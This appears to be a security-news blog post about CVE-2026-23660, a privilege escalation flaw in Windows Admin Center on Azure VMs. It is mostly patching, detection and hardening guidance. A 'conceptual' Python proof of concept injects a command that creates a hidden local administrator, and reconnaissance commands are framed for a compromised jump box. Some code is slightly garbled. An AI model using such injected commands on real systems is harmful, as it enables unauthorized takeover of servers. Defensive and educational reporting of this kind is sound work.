CVE-2026-23660: Azure-Bound Windows Admin Center Flaw Opens Door to Privilege Escalation—Patch Now + Video

Listen to this Post

Featured Image

Introduction:

A newly disclosed high-severity vulnerability, CVE-2026-23660, has been identified in the Azure-deployed version of Windows Admin Center (WAC), exposing cloud-managed infrastructure to Local Privilege Escalation (LPE) attacks. This flaw mirrors the attack vector of its predecessor, CVE-2025-64669, which affected on-premises deployments, highlighting a persistent weakness in how the management gateway handles authentication and authorization. For security professionals, this signifies a critical need to audit and update the WAC extension across all Azure-managed virtual machines to prevent unauthorized administrative control.

Learning Objectives:

  • Understand the technical relationship between CVE-2026-23660 and CVE-2025-64669 and their impact on Azure hybrid management.
  • Learn to identify vulnerable Windows Admin Center deployments in an Azure environment.
  • Implement mitigation strategies, including extension updates, access control lists, and network segmentation.

You Should Know:

1. Vulnerability Deep Dive: From On-Prem to Azure

The core issue in both CVE-2025-64669 and CVE-2026-23660 lies in improper handling of user-supplied input within the Windows Admin Center gateway service. In Azure, WAC runs as a virtual machine (VM) extension, listening on a specific port (typically 443 or 6516) to allow browser-based remote management. The flaw allows a low-privileged user on the host machine—or a remote attacker who has achieved initial access—to send crafted requests to the local gateway, forcing it to execute arbitrary commands with SYSTEM privileges.

Extended Context from Previous Research:

The original on-premises vulnerability (CVE-2025-64669) involved manipulating the gateway’s REST API endpoints. Since WAC in Azure utilizes a nearly identical codebase for its extension, the attack surface remains the same. An attacker who compromises a low-privileged application or user account on an Azure VM can leverage this flaw to take full control of the server, effectively bypassing Azure’s management plane security if the extension is left unpatched.

2. Step‑by‑Step Guide: Simulating the Exploit (Educational Context)

Disclaimer: The following commands are for educational and defensive research purposes only. Unauthorized exploitation is illegal.

To understand the mechanics, researchers often analyze the API endpoints that are exposed locally. On a test machine with an older version of Windows Admin Center installed (pre-patch), you could identify the service and its listening ports.

Check if Windows Admin Center is running (Local/Test Environment):

 PowerShell (Admin) - Check for the WAC service
Get-Service -Name "ServerManagementGateway" | Format-List

Find the process and its listening port
netstat -ano | findstr :6516
 Note the PID, then check the process
tasklist | findstr <PID>

Simulating the Attack Vector (Conceptual Code Snippet):

The exploitation technique involves crafting a request that includes a path traversal or command injection payload within a trusted API call. A proof-of-concept (PoC) might look like this in Python, targeting the local gateway:

import requests
import json

Target the local Windows Admin Center gateway (default port 6516)
url = "https://localhost:6516/api/privileged-endpoint"

Crafted payload to execute a command (e.g., add a local admin)
 This is a simplified representation of the injection point
payload = {
"action": "runCommand",
"command": "net user hacker P@ssw0rd /add & net localgroup administrators hacker /add"
}

Headers attempting to bypass local authentication
headers = {
"User-Agent": "Windows Admin Center Client",
"Content-Type": "application/json"
}

In a real exploit, the vulnerability might allow signature bypass
try:
 Disable SSL verification for local testing
response = requests.post(url, json=payload, headers=headers, verify=False)
print(f"Status Code: {response.status_code}")
print(f"Response: {response.text}")
except requests.exceptions.ConnectionError:
print("Ensure WAC is running on https://localhost:6516")

Linux-Based Reconnaissance (If you have compromised a Linux jump box managing Azure):

 From a Linux host, check if you can reach the WAC port on an Azure VM
nmap -p 6516 <Azure_VM_IP>

Use curl to probe the endpoint (if accessible over the network)
curl -k https://<Azure_VM_IP>:6516/api/health

3. Mitigation: Updating the Azure VM Extension

Microsoft has released a fix. Defenders must ensure the Windows Admin Center extension is updated across all subscriptions.

Using Azure CLI:

 List all VMs with the WAC extension
az vm extension list --vm-name <VM-Name> --resource-group <RG-Name> --query "[?name=='AdminCenter']"

Update the extension to the latest version
az vm extension set --vm-name <VM-Name> \
--resource-group <RG-Name> \
--name AdminCenter \
--publisher Microsoft.WindowsAdminCenter \
--version 2.0.0  Replace with the latest patched version

Using PowerShell (Azure Module):

 Get the VM object
$VM = Get-AzVM -ResourceGroupName "YourRG" -Name "YourVM"

Check the current version of the WAC extension
Get-AzVMExtension -ResourceGroupName "YourRG" -VMName "YourVM" -Name "AdminCenter"

Update the extension
Set-AzVMExtension -ResourceGroupName "YourRG" `
-Location $VM.Location `
-VMName "YourVM" `
-Name "AdminCenter" `
-Publisher "Microsoft.WindowsAdminCenter" `
-ExtensionType "AdminCenter" `
-TypeHandlerVersion "2.0" `
-Settings @{}  Use appropriate settings for your environment

4. Detection: Identifying Compromise via Log Analysis

After patching, check for signs of attempted exploitation. Look for anomalous process creation by the WAC gateway.

Windows Event Logs (Security & System):

  • Event ID 4688 (Process Creation): Look for processes like `cmd.exe` or `powershell.exe` spawned by `smgmsvc.exe` (the WAC service).
  • Event ID 4624 (Logon): Check for unexpected account logons, especially if a new admin account was created.

PowerShell Log Hunting:

 Search for suspicious command lines originating from the WAC service
Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4688} | 
Where-Object { $<em>.Properties[bash].Value -like 'net user' -or $</em>.Properties[bash].Value -like 'powershell' } | 
Format-List TimeCreated, Message

Azure Resource Graph Query:

To get an inventory of all VMs with the WAC extension across your tenant:

resources
| where type =~ 'Microsoft.Compute/virtualMachines/extensions'
| where name contains 'AdminCenter'
| project resourceGroup, vmId = properties.vmId, version = properties.typeHandlerVersion
| join kind=leftouter (
resources
| where type =~ 'Microsoft.Compute/virtualMachines'
| project vmId = id, vmName = name
) on $left.vmId == $right.vmId
| project resourceGroup, vmName, version
| order by vmName asc

5. Hardening Windows Admin Center Deployments

Beyond patching, restrict access to the WAC gateway.

Firewall Rules (Windows Defender Firewall with Advanced Security):

Limit access to the WAC port (e.g., 6516) to only authorized administrative subnets.

 Allow only a specific management subnet (e.g., 10.0.1.0/24)
New-NetFirewallRule -DisplayName "Restrict WAC Access" `
-Direction Inbound `
-LocalPort 6516 `
-Protocol TCP `
-RemoteAddress 10.0.1.0/24 `
-Action Allow

 Block all others
New-NetFirewallRule -DisplayName "Block WAC Access" `
-Direction Inbound `
-LocalPort 6516 `
-Protocol TCP `
-Action Block

Network Security Groups (NSG) in Azure:

Create an NSG rule for the subnet or VM NIC that restricts inbound traffic on port 6516 to your corporate public IP or a jumpbox IP.

What Undercode Say:

  • Immediate Patching is Non-Negotiable: The CVE-2026-23660 flaw is a direct pathway from a standard user to SYSTEM. In a cloud context, this means an attacker could move laterally from a compromised application to the host, and potentially pivot to other Azure resources using the VM’s managed identity if not properly restricted.
  • Cloud Extensions are an Attack Surface: Many organizations treat Azure VM extensions as “benign” background components. This incident proves that they require the same rigorous patch management and access control as the operating system itself. Continuous monitoring of extension versions via tools like Azure Policy is essential.
  • Defense in Depth for Management Tools: Never rely solely on the authentication of a management tool. Isolate management traffic, enforce Just-In-Time (JIT) access, and use Privileged Identity Management (PIM) for roles that can access these management interfaces. The convergence of on-prem and cloud management tools creates a hybrid attack surface that requires unified security visibility.

Prediction:

The discovery of CVE-2026-23660 signals a worrying trend where cloud-native tools inherit legacy on-premises vulnerabilities. As management planes become more centralized and complex, we will see an increase in “transplanted” vulnerabilities. Future attacks will likely focus on chaining these management tool flaws with cloud identity weaknesses, allowing attackers to not only compromise individual VMs but also manipulate the Azure Resource Manager to deploy backdoors or exfiltrate data at scale.

▶️ Related Video (84% Match):

🎯Let’s Practice For Free:

IT/Security Reporter URL:

Reported By: Ben Zamir – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow UndercodeTesting & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin | 🦋BlueSky